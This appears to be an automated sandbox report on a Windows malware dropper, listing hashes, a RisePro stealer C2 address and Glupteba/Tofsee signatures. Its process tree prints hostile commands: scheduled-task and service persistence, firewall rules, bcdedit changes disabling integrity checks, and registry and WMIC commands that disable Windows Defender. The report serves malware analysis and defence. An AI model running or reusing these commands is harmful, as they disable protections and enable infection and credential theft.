Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
-
submitted
17-05-2024 20:33
General
-
Target
file_x86x64_release/file.exe
-
Size
712.0MB
-
MD5
1b46efea69196395a3c449b51f34db34
-
SHA1
48f324b80cd0a99ae86b524ec87d0730b795829e
-
SHA256
ff5ef2b18f72873d947d56ff4d5e9ad98af122cd7260d9b2ae931f81df1fc4a7
-
SHA512
c92907ccd3ad05cd42ab34e71dfc4e45d5b4d6307411d880506197640210d82db726c467fb76bb773a96409a0d23484578c2825b1bc50103cc9b4636cbce2003
-
SSDEEP
98304:zTW+uIGD8foJWXlj+F2gMFqA/sOVfeS5zc4UcwqyB4qNGDPXRDCOBc4S5BTjGv0e:3QIGD8UyxfrRRfngGDqefMOBcxTg0lI
Malware Config
Extracted
risepro
147.45.47.126:58709
Signatures
-
Glupteba
Glupteba is a modular loader written in Golang with various components.
-
Modifies firewall policy service 2 TTPs 1 IoCs
-
RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
-
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
-
Windows security bypass 2 TTPs 48 IoCs
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
-
Modifies boot configuration data using bcdedit 14 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs
Run Powershell and hide display window.
-
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 1 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs 1 IoCs
-
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 27 IoCs
-
Loads dropped DLL 46 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Themida packer 10 IoCs
Detects Themida, an advanced Windows software protection system.
-
Windows security modification 2 TTPs 7 IoCs
-
Accesses Microsoft Outlook profiles 1 TTPs 9 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 1 IoCs
-
Drops Chrome extension 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Manipulates WinMon driver. 1 IoCs
Roottkits write to WinMon to hide PIDs from being detected.
-
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
-
Drops file in System32 directory 29 IoCs
-
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 9 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
-
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 20 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Kills process with taskkill 1 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies system certificate store 2 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file_x86x64_release\file.exe"C:\Users\Admin\AppData\Local\Temp\file_x86x64_release\file.exe"1⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\SimpleAdobe\H2d_rS6T6s1iVhCLxEYaTNs2.exeC:\Users\Admin\Documents\SimpleAdobe\H2d_rS6T6s1iVhCLxEYaTNs2.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks processor information in registry
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- outlook_office_path
- outlook_win_path
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_b169c3872385b2c3c15a1f5f96f34ffe LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\spanD6CqxmPSuDmz\wz6Hw5PB4YlLjbROQJwT.exe"C:\Users\Admin\AppData\Local\Temp\spanD6CqxmPSuDmz\wz6Hw5PB4YlLjbROQJwT.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f\MSIUpdaterV1.exe" /tn "MSIUpdaterV1_93c4750d07be7885c8f839a66372e48f LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\spanD6CqxmPSuDmz\FeqoXYseNmIthMKjdgxX.exe"C:\Users\Admin\AppData\Local\Temp\spanD6CqxmPSuDmz\FeqoXYseNmIthMKjdgxX.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2396 -s 964⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\R0gPmZULlnGTeOeBnccckE2A.exeC:\Users\Admin\Documents\SimpleAdobe\R0gPmZULlnGTeOeBnccckE2A.exe2⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "R0gPmZULlnGTeOeBnccckE2A.exe" /f & erase "C:\Users\Admin\Documents\SimpleAdobe\R0gPmZULlnGTeOeBnccckE2A.exe" & exit3⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "R0gPmZULlnGTeOeBnccckE2A.exe" /f4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\SimpleAdobe\2TcY1Wo_3BpV4zUMrgPGgdGV.exeC:\Users\Admin\Documents\SimpleAdobe\2TcY1Wo_3BpV4zUMrgPGgdGV.exe2⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\SimpleAdobe\K74QPCWYMx5gdzzZIESD3s7t.exeC:\Users\Admin\Documents\SimpleAdobe\K74QPCWYMx5gdzzZIESD3s7t.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\jgarsqdz\3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\cjmhgaau.exe" C:\Windows\SysWOW64\jgarsqdz\3⤵
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" create jgarsqdz binPath= "C:\Windows\SysWOW64\jgarsqdz\cjmhgaau.exe /d\"C:\Users\Admin\Documents\SimpleAdobe\K74QPCWYMx5gdzzZIESD3s7t.exe\"" type= own start= auto DisplayName= "wifi support"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" description jgarsqdz "wifi internet conection"3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\sc.exe"C:\Windows\System32\sc.exe" start jgarsqdz3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul3⤵
- Modifies Windows Firewall
-
C:\Users\Admin\Documents\SimpleAdobe\uGTwAk3x93AULqA5zvMljb18.exeC:\Users\Admin\Documents\SimpleAdobe\uGTwAk3x93AULqA5zvMljb18.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\is-B31QT.tmp\uGTwAk3x93AULqA5zvMljb18.tmp"C:\Users\Admin\AppData\Local\Temp\is-B31QT.tmp\uGTwAk3x93AULqA5zvMljb18.tmp" /SL5="$7014E,5009356,54272,C:\Users\Admin\Documents\SimpleAdobe\uGTwAk3x93AULqA5zvMljb18.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Free Studio\freestudio.exe"C:\Users\Admin\AppData\Local\Free Studio\freestudio.exe" -i4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Free Studio\freestudio.exe"C:\Users\Admin\AppData\Local\Free Studio\freestudio.exe" -s4⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\SimpleAdobe\_08E3ZwUao4FbTMoQEPDa4VO.exeC:\Users\Admin\Documents\SimpleAdobe\_08E3ZwUao4FbTMoQEPDa4VO.exe2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\SimpleAdobe\_08E3ZwUao4FbTMoQEPDa4VO.exe"C:\Users\Admin\Documents\SimpleAdobe\_08E3ZwUao4FbTMoQEPDa4VO.exe"3⤵
- Windows security bypass
- Executes dropped EXE
- Loads dropped DLL
- Windows security modification
- Adds Run key to start application
- Checks for VirtualBox DLLs, possible anti-VM trick
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"4⤵
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes5⤵
- Modifies Windows Firewall
- Modifies data under HKEY_USERS
-
C:\Windows\rss\csrss.exeC:\Windows\rss\csrss.exe4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Manipulates WinMon driver.
- Manipulates WinMonFS driver.
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks /delete /tn ScheduledUpdate /f5⤵
-
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER6⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:6⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:6⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows6⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe6⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe6⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 06⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn6⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 16⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}6⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast6⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -timeout 06⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\bcdedit.exeC:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}6⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exeC:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\bcdedit.exeC:\Windows\Sysnative\bcdedit.exe /v5⤵
- Modifies boot configuration data using bcdedit
-
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exeC:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe5⤵
- Executes dropped EXE
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F5⤵
- Creates scheduled task(s)
-
C:\Windows\windefender.exe"C:\Windows\windefender.exe"5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.execmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)6⤵
-
C:\Windows\SysWOW64\sc.exesc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)7⤵
- Launches sc.exe
-
C:\Users\Admin\Documents\SimpleAdobe\iKEollZpAmGQQcHBBDuGXkVh.exeC:\Users\Admin\Documents\SimpleAdobe\iKEollZpAmGQQcHBBDuGXkVh.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSAF81.tmp\Install.exe.\Install.exe3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zSB74E.tmp\Install.exe.\Install.exe /IIDQdidJQVBn "525403" /S4⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"5⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 67⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 68⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"6⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force7⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force8⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force9⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True8⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "butYHpXTvMdZIJsEKZ" /SC once /ST 20:36:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\kaSUqiV.exe\" LY /UGSdidHGtD 525403 /S" /V1 /F5⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn butYHpXTvMdZIJsEKZ"5⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn butYHpXTvMdZIJsEKZ6⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn butYHpXTvMdZIJsEKZ7⤵
-
C:\Users\Admin\Documents\SimpleAdobe\gxI7UmSQQ98SzCZqQasROc9V.exeC:\Users\Admin\Documents\SimpleAdobe\gxI7UmSQQ98SzCZqQasROc9V.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Adds Run key to start application
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_e0edcee3ae861882564c6a8803ee11a8\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_e0edcee3ae861882564c6a8803ee11a8 HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV202_e0edcee3ae861882564c6a8803ee11a8\MSIUpdaterV202.exe" /tn "MSIUpdaterV202_e0edcee3ae861882564c6a8803ee11a8 LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\spanHhlff6oz0dQg\jz7Hyw7XbVprJtKEObDU.exe"C:\Users\Admin\AppData\Local\Temp\spanHhlff6oz0dQg\jz7Hyw7XbVprJtKEObDU.exe"3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1036 -s 964⤵
- Loads dropped DLL
- Program crash
-
C:\Users\Admin\Documents\SimpleAdobe\pjz0476r0ksdn3bFD7d7gxdx.exeC:\Users\Admin\Documents\SimpleAdobe\pjz0476r0ksdn3bFD7d7gxdx.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\jgarsqdz\cjmhgaau.exeC:\Windows\SysWOW64\jgarsqdz\cjmhgaau.exe /d"C:\Users\Admin\Documents\SimpleAdobe\K74QPCWYMx5gdzzZIESD3s7t.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
- Windows security bypass
- Sets service image path in registry
- Drops file in System32 directory
-
C:\Windows\system32\makecab.exe"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240517203539.log C:\Windows\Logs\CBS\CbsPersist_20240517203539.cab1⤵
- Drops file in Windows directory
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-20657064611653785259932497380-496734294-6220615381723319754-678599583270739359"1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {D84EDAEA-AC2C-49CC-8C14-AAFF90CA88E7} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\kaSUqiV.exeC:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj\gvUvpqXuJGpWbAU\kaSUqiV.exe LY /UGSdidHGtD 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 66⤵
-
